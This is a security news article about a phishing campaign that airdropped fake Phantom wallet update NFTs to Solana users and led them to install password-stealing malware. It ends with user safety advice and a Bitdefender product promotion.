Fake Solana Security Update NFTs Hide Password-Stealing Malware
Solana asset owners recently received rogue NFTs masquerading as Phantom wallet security update alerts that led them to install password-stealing malware on their devices.
Threat actors launched the malicious campaign two weeks ago by airdropping “PHANTOMUPDATE.com” and “UPDATEPHANTOM.com” NFTs to several Solana wallets. Attackers tricked users into believing the NFTs were security warnings sent by Phantom developers.
Opening the NFTs displayed a warning that a new Phantom update had been released. The rogue notification urged users to update their wallets as soon as possible to avoid “loss of funds due to hackers exploiting the Solana network.”
The notification also included a couple of websites that, when accessed, triggered an automatic Windows batch (.BAT) file download from Dropbox. Launching the file initially performs a check for Administrator rights and, if not found, displays a User Access Control prompt asking for elevated permissions.
Granting the BAT permissions through the UAC dialog launches a PowerShell script that would eventually download another file named
windll32.exe from GitHub and launch it from
A Bleeping Computer analysis revealed that it was a strain of password-stealing malware that can extract various types of data from compromised systems, including cookies, passwords, SSH keys and browser information.
The campaign likely focused on crypto assets such as tokens and NFTs. However, password-stealing malware can wreak more havoc than just draining crypto wallets.
People who receive suspicious NFT airdrops should refrain from interacting with them and avoid visiting websites included in the assets’ description fields. To avoid inadvertently interacting with rogue NFTs, you can burn or hide them, depending on the wallet apps’ abilities.
If you have already accessed the URLs mentioned in the phony NFTs’ description field, scan your device for malware as soon as possible. Once the malware’s removed, you can secure your assets and change potentially compromised passwords. Changing passwords while you’re still infected could send your new password to the attackers, making it a futile effort.
Specialized tools like Bitdefender Ultimate Security can protect you against password-stealing malware and other types of cybernetic threats with its extensive range of features:
- 24/7 real-time data protection against viruses, worms, Trojans, zero-day exploits, ransomware, rootkits, spyware, and other e-threats
- Behavioral detection module that scans active apps and prevents infection upon detecting suspicious activity
- Anti-phishing system that detects and blocks suspicious websites that pose as legitimate ones to steal your data
- Anti-fraud module that notifies you whenever you land on websites that may try to scam you
How to monitor your online privacy during your Thanksgiving trip
November 22, 2022
Just your yearly dose of Black Friday spam: Cybercrooks get ahead of the game to steal shoppers’ info
November 16, 2022
Bitdefender VPN in 2022: the new, the improved, and the soon-to-be
November 14, 2022
August Spam Debrief: Bitdefender Labs Warns of Fraud Campaigns Exploiting the Russia-Ukraine War
August 31, 2022
Snake Keylogger Returns in Malspam Campaign Disguised as Business Portfolio from IT Vendor
August 30, 2022
What is medical identity theft and how to protect against it
July 27, 2022